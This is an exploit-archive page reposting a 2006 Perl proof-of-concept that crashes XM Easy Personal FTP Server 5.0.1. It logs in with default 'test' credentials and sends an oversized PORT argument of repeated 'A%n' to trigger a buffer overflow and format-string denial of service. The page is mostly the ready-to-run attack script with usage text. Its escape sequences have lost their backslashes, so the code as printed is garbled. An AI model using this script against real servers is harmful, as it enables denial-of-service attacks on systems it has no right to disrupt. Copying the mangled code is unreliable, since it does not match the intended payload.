XM Easy Personal FTP Server 5.0.1 (Port) Remote Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XM Easy Personal FTP Server 5.0.1 (Port) Remote Overflow PoC
# Published : 2006-06-24
# Author : Jerome Athias
# Previous Title : BitchX <= 1.1-final do_hook() Remote Denial of Service Exploit
# Next Title : Winamp <= 5.21 (Midi File Header Handling) Buffer Overflow PoC

#!/usr/bin/perl

# -----------------------------------------------------------
# Name        : XM Easy Personal FTP Server
# Version     : 5.0.1
# -----------------------------------------------------------
# Type        : dos / remote
# Multiple buffer overflows
# Port and multiple commands with A%n, ...
# -----------------------------------------------------------
# Jerome Athias - https://www.securinfos.info
# -----------------------------------------------------------

use Net::FTP;

$host = @ARGV[0];

if ($host)
{
   print "n- XM Easy Personal FTP Server 5.0.1 - PoC DoS Exploitn-
Jerome Athiasnhttps://www.securinfos.info";
   $ftp = Net::FTP->new($host, Debug => 0);
   $ftp->login('test','test'); #Maybe anonymous works ;-)
   $ftp->port("x41x25x6E"x9999);
}
else {
   print "n- XM Easy Personal FTP Server 5.0.1 - PoC DoS Exploitn-
Jerome Athiasnhttps://www.securinfos.infonn- Usage: $0 hostn";
}

# www.Syue.com [2006-06-24]